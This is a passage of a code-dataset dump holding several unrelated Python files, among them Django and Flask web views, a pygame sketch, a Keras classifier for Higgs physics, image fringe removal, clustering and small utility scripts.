'generated_enemies.html', context)\n\ndef select_setting_ruleset(request):\n if request.POST:\n setting_id = int(request.POST.get('setting_id', 1))\n request.session['setting_id'] = setting_id\n return redirect(index)\n\n@login_required\ndef edit_index(request):\n context = get_context(request)\n context['enemy_templates'] = EnemyTemplate.objects.filter(owner=request.user)\n context['edit_races'] = Race.objects.filter(owner=request.user)\n context['race_admin'] = is_race_admin(request.user)\n return render(request, 'edit_index.html', context)\n \ndef enemy_template(request, enemy_template_id):\n context = get_context(request)\n template = 'enemy_template.html'\n context['et'] = EnemyTemplate.objects.get(id=enemy_template_id)\n if context['et'].owner != request.user and request.user.username != 'admin':\n template = 'enemy_template_read_only.html'\n context['weapons'] = {}\n context['weapons']['1h'] = Weapon.objects.filter(type='1h-melee')\n context['weapons']['2h'] = Weapon.objects.filter(type='2h-melee')\n context['weapons']['ranged'] = Weapon.objects.filter(type='ranged')\n context['weapons']['shields'] = Weapon.objects.filter(type='shield')\n context['theism_spells'] = spell_list('theism', enemy_template_id)\n context['folk_spells'] = spell_list('folk', enemy_template_id)\n context['sorcery_spells'] = spell_list('sorcery', enemy_template_id)\n context['combat_styles'] = combat_styles(enemy_template_id)\n return render(request, template, context)\n \n@login_required\ndef race(request, race_id):\n context = get_context(request)\n context['race'] = Race.objects.get(id=race_id, owner=request.user)\n return render(request, 'race.html', context)\n\n@login_required\ndef create_race(request):\n rc = Race.create(owner=request.user)\n return redirect(race, rc.id)\n\n \n@login_required\ndef ruleset(request, ruleset_id):\n context = get_context(request)\n context['ruleset'] = Ruleset.objects.get(id=ruleset_id)\n return render(request, 'ruleset.html', context)\n\n@login_required\ndef create_enemy_template(request):\n setting = get_setting(request)\n ruleset = get_ruleset(request)\n race_id = int(request.POST.get('race_id'))\n if race_id == 0:\n return redirect(edit_index)\n race = Race.objects.get(id=race_id)\n et = EnemyTemplate.create(owner=request.user, setting=setting, ruleset=ruleset, race=race)\n return redirect(enemy_template, et.id)\n\n@login_required\ndef delete_template(request, template_id):\n context = get_context(request)\n try:\n et = EnemyTemplate.objects.get(id=template_id, owner=request.user)\n except EnemyTemplate.DoesNotExist:\n et = None\n context['et'] = et\n if request.POST:\n answer = request.POST.get('answer')\n if answer == 'Yes':\n et.delete()\n return redirect(edit_index)\n elif answer == 'No':\n return redirect(enemy_template, template_id)\n return render(request, 'delete_template.html', context)\n \n@login_required\ndef clone_template(request, template_id):\n et = EnemyTemplate.objects.get(id=template_id)\n new = et.clone(request.user)\n return redirect(enemy_template, new.id)\n \n@login_required\ndef apply_skill_bonus(request, template_id):\n et = EnemyTemplate.objects.get(id=template_id)\n if request.POST:\n et.apply_skill_bonus(request.POST.get('bonus'))\n return redirect(enemy_template, et.id)\n \n@login_required\ndef delete_race(request, race_id):\n context = get_context(request)\n try:\n rc = Race.objects.get(id=race_id, owner=request.user)\n except Race.DoesNotExist:\n rc = None\n context['race'] = rc\n if request.POST:\n answer = request.POST.get('answer')\n if answer == 'Yes':\n rc.delete()\n return redirect(edit_index)\n elif answer == 'No':\n return redirect(race, race_id)\n return render(request, 'delete_race.html', context)\n \ndef instructions(request):\n context = get_context(request)\n return render(request, 'instructions.html', context)\n","sub_path":"enemygen/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"104373621","text":"import sys\nimport random\nimport math\nimport os\nimport getopt\nimport pygame\nfrom socket import *\nfrom pygame.locals import *\n\nWIDTH = 1280\nHEIGHT = 680\n#global vars for dimensions\nFPS = 30\n# frames per second setting\nWHITE = (255, 255, 255)\n#define colors\n\nclass Level:\n def set_block(self, path):\n self.block = pygame.image.load(path).convert()\n\ndef initLevel1(level1): #make this level universal\n level1.set_block('level1/level_blocks/block1.png')\n ##do more setting up here\n #seeing what this will do\n\ndef outlineLevel(background, level):\n block1 = level.block\n b1W = block1.get_width()\n b1H = block1.get_height()\n start = [0, 0]\n background.fill(WHITE) #white for now\n background.blit(block1, (start[0], start[1]))\n for i in range(0, int(WIDTH/b1W)+1):\n background.blit(block1, (start[0]+(i*b1W), start[1]))\n background.blit(block1, (start[0]+(i*b1W), start[1]+(HEIGHT-b1H)))\n for i in range(0, int(HEIGHT/b1H)+1):\n background.blit(block1, (start[0], start[1]+(i*b1H)))\n background.blit(block1, (start[0]+(WIDTH-b1W), start[1]+(i*b1H)))\n\nif __name__ == \"__main__\":\n pygame.init()\n clock = pygame.time.Clock()\n BACKG = pygame.display.set_mode((WIDTH, HEIGHT))\n #init background\n pygame.display.set_caption('A Duck Kind of Game')\n level1 = Level()\n initLevel1(level1)\n outlineLevel(BACKG, level1)\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n pygame.display.update()\n clock.tick(FPS)\n","sub_path":"game1.py","file_name":"game1.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170352546","text":"\"\"\"\r\nPyTSL-specific exception types.\r\n\r\nAuthor: Wolfram Reinke\r\nDate: February 16, 2016\r\n\"\"\"\r\n\r\nfrom pytsl_11_1 import TSL_GetLastError, TSL_GetLastErrorText\r\n\r\n\r\nclass PyTSLException(Exception):\r\n \"\"\"\r\n Exception subclass to distinguish regular python errors from TSL errors\r\n \"\"\"\r\n def __init__(self, message=\"\"):\r\n self.message = message\r\n\r\n def __str__(self):\r\n return \"PyTSL error: \" + str(self.message)\r\n\r\n\r\nclass TSLException(PyTSLException):\r\n \"\"\"\r\n An exception caused by an error in TSL.\r\n\r\n When created, a TSLException automatically retrieves the last error code\r\n and error message from TSL. In addition, the user can specify their own\r\n message to clarify the context, the exception was thrown in.\r\n \"\"\"\r\n\r\n def __init__(self, user_message=None):\r\n self.user_message = user_message\r\n self.tsl_errcode = TSL_GetLastError()\r\n\r\n if not self.tsl_errcode == 0:\r\n self.tsl_message = TSL_GetLastErrorText()\r\n else:\r\n self.tsl_message = None\r\n\r\n def __str__(self):\r\n result = \"TSL error \"\r\n if not self.tsl_errcode == 0:\r\n result += str(self.tsl_errcode)\r\n\r\n if self.user_message is None:\r\n result += \": \"\r\n else:\r\n result += str(self.user_message) + \", caused by: \"\r\n\r\n if self.tsl_message is not None:\r\n result += str(self.tsl_message)\r\n\r\n return result","sub_path":"cd/pytsl/pytsl/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"126051772","text":"from __future__ import print_function, division\r\nimport sys\r\nsys.path.append('/Users/banano/Documents/PythonUtils')\r\n\r\nimport numpy as np\r\nimport databandit\r\n#import databandit.variables as dbv\r\nimport databandit.functions as dbf\r\nimport h5py\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.linalg import pinv, lu, solve\r\nfrom sklearn.linear_model import Lasso\r\n\r\n__author__ = 'dimitris'\r\n\r\ndef fringeremoval(img_list, ref_list, mask='all', method='svd'):\r\n\r\n nimgs = len(img_list)\r\n nimgsR = len(ref_list)\r\n xdim = img_list[0].shape[0]\r\n ydim = img_list[0].shape[1]\r\n \r\n if mask == 'all':\r\n bgmask = np.ones([ydim, xdim])\r\n # around 2% OD reduction with no mask\r\n else:\r\n bgmask = mask\r\n \r\n k = (bgmask == 1).flatten(1)\r\n \r\n # needs to be >float32 since float16 doesn't work with linalg\r\n \r\n R = np.dstack(ref_list).reshape((xdim*ydim, nimgsR)).astype(np.float32)\r\n A = np.dstack(img_list).reshape((xdim*ydim, nimgs)).astype(np.float32)\r\n \r\n # Timings: for 50 ref images lasso is twice as slow\r\n # lasso 1.00\r\n # svd 0.54\r\n # lu 0.54\r\n \r\n optref_list = []\r\n \r\n for j in range(A.shape[1]):\r\n \r\n if method == 'svd':\r\n b = R[k, :].T.dot(A[k, j])\r\n Binv = pinv(R[k, :].T.dot(R[k, :])) # svd through pinv\r\n c = Binv.dot(b)\r\n # can also try linalg.svd()\r\n \r\n elif method == 'lu':\r\n b = R[k, :].T.dot(A[k, j])\r\n p, L, U = lu(R[k, :].T.dot(R[k, :]))\r\n c = solve(U, solve(L, p.T.dot(b)))\r\n \r\n elif method == 'lasso':\r\n lasso = Lasso(alpha=0.01)\r\n lasso.fit(R, A)\r\n c = lasso.coef_\r\n \r\n else:\r\n raise Exception('Invalid method.')\r\n \r\n optref_list.append(np.reshape(R.dot(c), (xdim, ydim)))\r\n \r\n return optref_list\r\n \r\n#%% Run example\r\n# first load images\r\n \r\nfolder = '/Users/dimitris/BT Sync/DT_JQI/Eigenface_LASSO/Data/2014/December/04/'\r\nfilename = 'Flea3_04Dec2014_0070.ibw'\r\n\r\nprobe_list = []\r\n\r\n# little improvement on the fit when using >20 probe pictures\r\n\r\n# create a list of all probe pics\r\nwith h5py.File('Data_04Dec2014_0068_0119.h5', 'r') as f:\r\n for idx in range(70, 110):\r\n probe_list.append(f['/data/{:d}/image'.format(idx)][:, :])\r\n\r\n# load an image to fit to\r\nimg = dbf.loadfile(folder + filename)\r\nimg_raw = [img['Raw'][0]]\r\nimg_od = img['OptDepth']\r\n\r\n#%% call the function and plot the output\r\n\r\noptref = fringeremoval(img_raw, probe_list)\r\n\r\nod_opt = -np.log(((img_raw[0] < 1) + img_raw[0]) / (\r\n (optref[0] < 1) + optref[0]))\r\n\r\n# compare with od calculated in qgasfileio\r\nplt.imshow(img_od)\r\nplt.figure()\r\nplt.imshow(od_opt)","sub_path":"uWaves/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"45251265","text":"from subprocess import Popen, PIPE, check_output\nfrom contextlib import ExitStack\nfrom common_tools.gzip_opener import *\n\nfname='/home/stephen/x_db/DBuck/s_richer/stephen_test/projects/hic_analysis/raw_data/HB2_CL4-1-R1.fastq.gz'\ntry:\n with ExitStack() as stack:\n p1 = stack.enter_context(\n Popen(['zcat', '-f', fname], stdout = PIPE))\n p2 = stack.enter_context(\n Popen(['wc', '-l'], stdin = p1.stdout, stdout = PIPE))\n nlines, error = p2.communicate()\nexcept FileNotFoundError:\n with smart_open(fname) as f:\n nlines = sum(1 for line in f)\n \nprint(int(nlines))\n","sub_path":"src/pyFastQTools/count_lines.py","file_name":"count_lines.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"354711204","text":"# Futures #\nfrom __future__ import division\n\n# Built-in modules #\n\n# Internal modules #\nfrom gefes.common.autopaths import AutoPaths\nfrom gefes.common.cache import property_cached\n\n# Third party modules #\nimport pandas\nfrom sklearn import cluster\nfrom scipy.spatial import distance\nfrom scipy.cluster import hierarchy\nfrom sklearn.cluster import KMeans\n\n###############################################################################\nclass Clusterer(object):\n \"\"\"Recieves the matrix detailing all information for every contig,\n and is responsible for deciding which contigs go together.\"\"\"\n\n all_paths = \"\"\"\n /lorem.txt\n \"\"\"\n\n def __repr__(self): return '<%s object of %s>' % (self.__class__.__name__, self.parent)\n\n def __init__(self, pool):\n # Save parent #\n self.parent, self.pool = pool, pool\n # Auto paths #\n self.base_dir = self.parent.p.clustering\n self.p = AutoPaths(self.base_dir, self.all_paths)\n self.kmeans = GefesKMeans(self)\n self.min_length = 0;\n self.max_freq = 0;\n \n def run(self):\n pass\n\n def frame_filter(self):\n temp_frame = self.parent.frame\n if(self.min_length):\n temp_frame = temp_frame[temp_frame.length > self.min_length]\n if(self.max_freq):\n good_ones = temp_frame[[c for c in temp_frame if \"freq\" in c]].apply(lambda x: sum(x>self.max_freq)!=0,1)\n temp_frame = temp_frame[good_ones]\n tetras = temp_frame[[c for c in temp_frame if \"freq\" in c]]\n covers = temp_frame[[c for c in temp_frame if \"freq\" not in c and c!=\"length\"]]\n names = [f[0] for f in temp_frame.itertuples()]\n return (names,tetras,covers)\n\n \n###############################################################################\nclass GefesKMeans(object):\n \"\"\"Receives the matrix and uses kmeans to cluster it in N different (linearly separated) clusters\"\"\"\n\n def __init__(self,parent,number_clusts=8):\n self.number_clusts=number_clusts\n self.parent = parent\n\n @property_cached\n def algorithm(self):\n return KMeans(self.number_clusts)\n\n @property_cached\n def tetras_clusters(self):\n (names,tetras,covers) = self.parent.frame_filter()\n return self.algorithm.fit_predict(tetras)\n\n @property_cached\n def coverage_clusters(self):\n (names,tetras,covers) = self.parent.frame_filter()\n return self.algorithm.fit_predict(covers)\n\n \n","sub_path":"gefes/helper/clusterer.py","file_name":"clusterer.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356326972","text":"#!/usr/bin/env python\n\"\"\"\nTrain MLP classifer to identify vector-boson fusion Higgs against background\n\"\"\"\n__author__ = \"Sid Mau, Doug Schaefer\"\n\n###############################################################################\n# Import libraries\n##################\ntraining_name='_test'\n\n# Tensorflow and Keras\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, LSTM\n#from keras import optimizers\n#from keras import regularizers\nimport keras.backend as K\nfrom custom_loss import *\n# Scikit-learn\nimport sklearn.metrics as metrics\n#from sklearn.metrics import classification_report, average_precision_score, precision_recall_curve, confusion_matrix\nfrom sklearn.model_selection import train_test_split, StratifiedKFold\nfrom sklearn import preprocessing\nfrom sklearn.utils import class_weight\n#from keras.wrappers.scikit_learn import KerasClassifier\n#from sklearn.model_selection import GridSearchCV\n\n# Scipy\nfrom scipy import stats\nimport numpy as np\nimport numpy.lib.recfunctions as recfn\n\n# Matplotlib\nimport matplotlib;matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n###############################################################################\n\n###############################################################################\n# Load data\n###########\n\n# VBFH125 (signal)\nVBFH125 = np.load('VBFH125.npy')\nlabel_VBFH125 = np.ones(len(VBFH125))\nVBFH125_labelled = recfn.rec_append_fields(VBFH125, 'label', label_VBFH125)\nVBFH125_labelled['w']*=10.0 # adding weight to center the distribution\n\n# Z_strong (background)\nZ_strong = np.load('Z_strong.npy')\nlabel_Z_strong = np.zeros(len(Z_strong))\nZ_strong_labelled = recfn.rec_append_fields(Z_strong, 'label', label_Z_strong)\n\n# Z_EWK (background)\nZ_EWK = np.load('Z_EWK.npy')\nlabel_Z_EWK = np.zeros(len(Z_EWK))\nZ_EWK_labelled = recfn.rec_append_fields(Z_EWK, 'label', label_Z_EWK)\n\n# ttbar (background)\nttbar = np.load('ttbar.npy')\nlabel_ttbar = np.zeros(len(ttbar))\nttbar_labelled = recfn.rec_append_fields(ttbar, 'label', label_ttbar)\n\n# W_strong (background)\nW_strong = np.load('W_strong.npy')\nlabel_W_strong = np.zeros(len(W_strong))\nW_strong_labelled = recfn.rec_append_fields(W_strong, 'label', label_W_strong)\n\n###############################################################################\n\n###############################################################################\n# Concatenate and shuffle data\n##############################\n\ndata = np.concatenate([VBFH125_labelled, Z_strong_labelled])\n#data = np.concatenate([VBFH125_labelled, Z_strong_labelled, ttbar_labelled, W_strong_labelled])\nnp.random.shuffle(data) # shuffle data\n\n###############################################################################\n\n###############################################################################\n# Select variables\n##################\n\n##COLS = ['jj_mass', 'jj_deta', 'jj_dphi', 'met_tst_et', 'met_soft_tst_et', 'jet_pt[0]', 'jet_pt[1]']\n#COLS = ['jj_mass', 'jj_deta', 'jj_dphi', 'met_tst_et', 'jet_pt[0]', 'jet_pt[1]']\n#print('cols = {}'.format(COLS))\n#X = data[COLS]\n#y = data['label']\n#X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n#X_train = X_train.astype([(name, ' 0.3, 1, 0)\n#print(classification_report(y_test, y_pred_bool))\n#print(confusion_matrix(y_test, y_pred_bool))\n\n# calculate the fpr and tpr for all thresholds of the classification\ny_pred = model.predict(np.array(X_test))\nfpr, tpr, threshold = metrics.roc_curve(y_test, y_pred)\nroc_auc = metrics.auc(fpr, tpr)\n\n# plot ROC curve\nplt.figure()\nplt.fill_between(fpr, 0, tpr, facecolor='b', alpha=0.3, label='AUC = {:0.3f}'.format(roc_auc), zorder=0)\nplt.plot([0, 1], [0, 1], c='gray', lw=1, ls='--', zorder=1)\nplt.plot(fpr, tpr, c='b', lw=2, ls='-', label='ROC Curve', zorder=2)\nplt.legend(loc='upper left')\nplt.xlim([0, 1])\nplt.ylim([0, 1])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver Operating Characteristic (ROC)')\nplt.savefig('ROC'+training_name+'.pdf', bbox_inches='tight', rasterized=False)\nplt.close()\n\n## plot PR curve\n#average_precision = average_precision_score(y_test, y_pred)\n#print('Average precision-recall score: {0:0.2f}'.format(average_precision))\n#\n#precision, recall, _ = precision_recall_curve(y_test, y_pred)\n#\n#plt.figure()\n#plt.fill_between(recall, precision, alpha=0.2, color='b')\n#plt.xlabel('Recall')\n#plt.ylabel('Precision')\n#plt.ylim([0.0, 1.05])\n#plt.xlim([0.0, 1.0])\n#plt.title('2-class Precision-Recall curve: AP={0:0.2f}'.format(average_precision))\n#plt.savefig('PR'+training_name+'.pdf', bbox_inches='tight', rasterized=False)\n#plt.close()\n\n# score predictions\nscore_train = np.concatenate(model.predict(np.array(X_train)))\nscore_test = np.concatenate(model.predict(np.array(X_test)))\nprint('KS test for score_train/score_test: {}'.format(stats.ks_2samp(score_train, score_test)))\n\n# define sig/bkg regions\nsig_train = (y_train == 1)\nsig_test = (y_test == 1)\nbkg_train = (y_train == 0)\nbkg_test = (y_test == 0)\n\n# select sig/bkg for train/test and weights\nsignal_train = score_train[sig_train]\nwsignal_train = w_train[sig_train]\nsignal_test = score_test[sig_test]\nwsignal_test = w_test[sig_test]\nbackground_train = score_train[bkg_train]\nwbackground_train = w_train[bkg_train]\nbackground_test = score_test[bkg_test]\nwbackground_test = w_test[bkg_test]\n\n# make histograms\nnbins = 51\nbins = np.linspace(0, 1, nbins)\nsignal_train_counts, edges = np.histogram(signal_train, bins=bins, density=False, weights=wsignal_train)\nsignal_test_counts, edges = np.histogram(signal_test, bins=bins, density=False, weights=wsignal_test)\nbackground_train_counts, edges = np.histogram(background_train, bins=bins, density=False, weights=wbackground_train)\nbackground_test_counts, edges = np.histogram(background_test, bins=bins, density=False, weights=wbackground_test)\nwidth = np.diff(edges)\nsignal_train_hist = signal_train_counts / np.sum(np.multiply(signal_train_counts, width))\nsignal_test_hist = signal_test_counts / np.sum(np.multiply(signal_test_counts, width))\nbackground_train_hist = background_train_counts / np.sum(np.multiply(background_train_counts, width))\nbackground_test_hist = background_test_counts / np.sum(np.multiply(background_test_counts, width))\n\nsignal_test_std = np.array([np.sqrt(np.sum((wsignal_test[np.where(np.digitize(signal_test, edges)-1==nbin)[0]])**2)) for nbin in range(nbins-1)]) / np.sum(np.multiply(signal_test_counts, width))\nbackground_test_std = np.array([np.sqrt(np.sum((wbackground_test[np.where(np.digitize(background_test, edges)-1==nbin)[0]])**2)) for nbin in range(nbins-1)]) / np.sum(np.multiply(background_test_counts, width))\n\n# compute KS for sig/bkg prob\nks_signal = stats.ks_2samp(signal_train, signal_test)[1]\nks_background = stats.ks_2samp(background_train, background_test)[1]\n\n# plot output distribution\nplt.figure()\nplt.bar((edges[1:]+edges[:-1])/2, background_train_hist, align='center', width=width, edgecolor=None, facecolor='r', alpha=0.3, label='Background (train)', zorder=1)\nplt.errorbar((edges[1:]+edges[:-1])/2, background_test_hist, yerr=background_test_std, xerr=(edges[1:]-edges[:-1])/2, ecolor='r', elinewidth=1, fmt='none', label='Background (test)', zorder=2)\nplt.bar((edges[1:]+edges[:-1])/2, signal_train_hist, align='center', width=width, edgecolor=None, facecolor='b', alpha=0.3, label='Signal (train)', zorder=1)\nplt.errorbar((edges[1:]+edges[:-1])/2, signal_test_hist, yerr=signal_test_std, xerr=(edges[1:]-edges[:-1])/2, ecolor='b', elinewidth=1, fmt='none', label='Signal (test)', zorder=4)\n\nplt.text(1-0.025, 0.825, 'KS sig (bkg) prob: {:0.3f} ({:0.3f})'.format(ks_signal, ks_background), transform=plt.gca().transAxes, horizontalalignment='right', verticalalignment='top')\nplt.xlim(0, 1)\nplt.ylim(bottom=0)\n#plt.grid(zorder=0)\nplt.legend(ncol=2, loc='upper right')\nplt.xlabel('Keras ANN Score')\nplt.ylabel('Events (Normalized)')\nplt.title('Classifier Overtraining Check')\nplt.savefig('overtrain'+training_name+'.pdf', bbox_inches='tight', rasterized=False)\nplt.close()\n\n###############################################################################\n","sub_path":"Plotting/ANN/trainMLP.py","file_name":"trainMLP.py","file_ext":"py","file_size_in_byte":12874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395388161","text":"import pickle\r\nfrom flask import Flask,render_template,url_for,request\r\n\r\n# load the model from disk\r\nclf = pickle.load(open('model.pkl', 'rb'))\r\ncv=pickle.load(open('fittranform.pkl','rb'))\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n\treturn render_template('index.html')\r\n\r\n\r\n@app.route('/predict',methods=['POST'])\r\ndef predict(): \r\n if request.method == 'POST':\r\n query = request.form['query']\r\n data = [query]\r\n vect = cv.transform(data).toarray()\r\n my_prediction = clf.predict(vect)\r\n return render_template('result.html',prediction = my_prediction)\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"205254235","text":"from flask_pro import app\nfrom flask import render_template,redirect, url_for, flash, get_flashed_messages\nfrom flask_pro.Model import Base, User\nfrom flask_pro.forms import RegisterForm, LoginForm\nfrom flask_pro import db\nfrom flask_login import login_user, logout_user, login_required\n@app.route('/')\n@app.route('/home')\ndef home_page():\n return render_template('home.html')\n\n@app.route('/flask')\n@login_required\ndef flask_page():\n items = Base.query.all()\n return render_template('flask.html', items=items)\n\n@app.route('/register', methods=['GET','POST'])\ndef register_page():\n form = RegisterForm()\n if form.validate_on_submit():\n user_to_create = User(user_name=form.username.data,\n email_address=form.email.data,\n password=form.password1.data)\n db.session.add(user_to_create)\n db.session.commit()\n login_user(user_to_create)\n flash(f\"Account Created Successfully! You are now logged in as {user_to_create.user_name}\", category='Success')\n return redirect(url_for('login_page'))\n if form.errors != {}:\n for err_msg in form.errors.values():\n flash(f'There was an error with creating a user :{err_msg}', category='danger')\n\n return render_template('register.html', form=form)\n\n@app.route('/login', methods=['GET','POST'])\ndef login_page():\n form = LoginForm()\n if form.validate_on_submit():\n attempted_user = User.query.filter_by(user_name=form.username.data).first()\n if attempted_user and attempted_user.check_password_correction(attempted_password=form.password.data):\n login_user(attempted_user)\n flash(f'Success! You are logged in as: { attempted_user.user_name}', category='Success')\n return redirect(url_for('flask_page'))\n\n# else:\n# flash('Username and Password are not match! Please Try Again', category='danger')\n\n return render_template('login.html', form=form)\n\n@app.route('/logout')\ndef logout_page():\n logout_user()\n flash('You have been Logged out', category='info')\n return redirect(url_for('home_page'))","sub_path":"flask_pro/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"11426964","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor : Ntwali Bashige\nCopyright : Copyright 2019 - Ntwali Bashige\nLicense : MIT\nVersion : 0.0.1\nMaintainer : Ntwali Bashige\nEmail : ntwali.bashige@gmail.com\n\"\"\"\n\nfrom common.operations import OpCode\n\nclass Bytecode(object):\n \"\"\"Array of bytes representing the compiled code\n \n This class holds an array that contains the bytes representing the compiled program.\n We may write this array to a file and allow any other program to read and interpret its content.\n\n Attributes:\n code (bytearray): An array holding integers of bounded between 0 and 255.\n\n Note:\n - Think about implementing a buffered append so that we do not need to append a single byte at a time.\n - Add method to load bytecode from a file.\n \"\"\"\n code = bytearray()\n\n def length(self):\n \"\"\"Retuns the number of bytes held in the bytecode\"\"\"\n return len(self.code)\n\n def append(self, byte):\n \"\"\"This method appends a new byte to the bytecode.\n\n As we receive new bytes, this method validates the new byte and append it to the bytecode.\n\n Args:\n byte(OpCode|int): The byte to append to the bytecode\n\n Raises:\n ValueError: If byte is not an integer between 0 and 255\n \"\"\"\n # If we are given an opcode directly but not as an integer, we convert it to an integer\n if isinstance(byte, OpCode) == True:\n byte = int(byte)\n\n # Make sure the byte is an integer\n if isinstance(byte, int) == False:\n raise ValueError(\"Invalid byte to write to bytecode: <\" + str(byte) + \">. Expected an integer.\")\n \n # Make sure the byte is within a bytearray limits\n if byte < 0 or byte > 255:\n raise ValueError(\"Invalid byte to write to bytecode: <\" + str(byte) + \">. Byte not within bounds.\")\n\n # Write the byte into the bytearray\n self.code.append(byte)\n","sub_path":"vm/src/common/bytecode.py","file_name":"bytecode.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"499144169","text":"# This script selects a random column from a set of columns (based on certain conditions)\n# and removes entries in the other columns. Used as part of MENE statistical analysis.\nimport csv\nimport random\n\ninputCSV = open('','rb')\noutputCSV = open('','wb')\n\nwriter = csv.writer(outputCSV)\n\nfor row in csv.reader(inputCSV):\n\n\t# All columns included in the process\n\tincludedColumns = [8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28]\n\t# Create a dictionary of columns\n\tcontent = {i: row[i] for i in includedColumns}\n\t# Remove certain columns based on a criteria - in this example, if they are not equal to one\n\tfor key, value in content.items():\n\t\tif value != '1':\n\t\t\tdel content[key]\n\t\n\t# Select random object (key, pair) from dictionary only if dictionary isn't empty\n\tif any(content):\n\t\tcolumn, value = random.choice(list(content.items()))\n\t\t# Remove selected column from dictionary\n\t\tincludedColumns.remove(column)\n\n\t\t# For values left in the dictionary, make these equal to zero in the row\n\t\tfor values in includedColumns:\n\t\t\trow[values] = 0\n\n\t\t# Write the row\n\t\twriter.writerow(row)\n\telse:\n\t\twriter.writerow(row)\n\n#close all csv's\ninputCSV.close()\noutputCSV.close()\n\n\n\n","sub_path":"Scripts/randomColumnSelectionInCSV.py","file_name":"randomColumnSelectionInCSV.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352092169","text":"list1 = [1,2,3,4,5]\nlist2 = [7,8,9,10]\nlist2.append(6)\nnew_list = list1 + list2\nprint(list2)\nprint(new_list)\n\nlang=[\"C\",\"C++\",\"Java\"]\nlang.append(\"Python\")\nprint(lang)\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"438879292","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n Created by Régis Eduardo Crestani on 05/07/2016.\n\"\"\"\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.charts_map, name='charts-map'),\n url(r'^most-requested[/]?$', views.most_requested, name='most-requested'),\n url(r'^most-requested-with-status[/]?$', views.most_requested_with_status, name='most-requested-with-status'),\n url(r'^most-bytes[/]?$', views.most_bytes, name='most-bytes'),\n url(r'^most-bytes-average[/]?$', views.most_bytes_average, name='most-bytes-average'),\n url(r'^most-used-bytes[/]?$', views.most_used_bytes, name='most-used-bytes'),\n url(r'^most-used-bytes-average[/]?$', views.most_used_bytes_average, name='most-used-bytes-average'),\n url(r'^most-latency[/]?$', views.most_latency, name='most-latency'),\n url(r'^most-latency-average[/]?$', views.most_latency_average, name='most-latency-average'),\n url(r'^most-used-latency[/]?$', views.most_used_latency, name='most-used-latency'),\n url(r'^most-used-latency-average[/]?$', views.most_used_latency_average, name='most-used-latency-average'),\n url(r'^requests-by-date[/]?$', views.requests_by_date, name='requests-by-date'),\n url(r'^used-bytes-average-by-date[/]?$', views.used_bytes_average_by_date, name='used-bytes-average-by-date'),\n url(r'^used-bytes-avg-min-max-by-date[/]?$', views.used_bytes_avg_min_max_by_date,\n name='used-bytes-avg-min-max-by-date'),\n url(r'^used-latency-average-by-date[/]?$', views.used_latency_average_by_date, name='used-latency-average-by-date'),\n url(r'^used-latency-avg-min-max-by-date[/]?$', views.used_latency_avg_min_max_by_date,\n name='used-latency-avg-min-max-by-date'),\n # url(r'^products/', include('resource.product.urls')),\n]\n","sub_path":"django_usage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"260018087","text":"import wsgi_server\nimport os\nfrom werkzeug.wsgi import SharedDataMiddleware\nfrom cas import CASMiddleware\nimport logging\nfrom werkzeug.contrib.sessions import FilesystemSessionStore\nfrom werkzeug.wrappers import Response\n\n#logging.basicConfig(level=logging.DEBUG)\n\n#This function is called if:\n# Not authenticated\n# the ignore_redirect regex matches the (full) url pattern\ndef ignored_callback(environ, start_response):\n response = Response('{\"Error\":\"NotAuthenticated\"}')\n# response.status = '401 Unauthorized'\n response.status = '200 OK'\n response.headers['Content-Type'] = 'application/json'\n\n return response(environ, start_response)\n\napplication = wsgi_server.application\n\napplication = SharedDataMiddleware(application, {\n '/static': os.path.join(os.path.dirname(__file__), 'static')\n})\n\n#The URL of your CAS server - if this is set then CAS will be enabled\n# e.g. https://mydomain/cas\nCAS_SERVICE = ''\n#This is the CAS protocol version versions 2 and 3 supported (3 is only available in CAS 4)\nCAS_VERSION = 3\n#A URL to use as the link to logout\nCAS_LOGOUT_PAGE = '/logout'\n#Where to 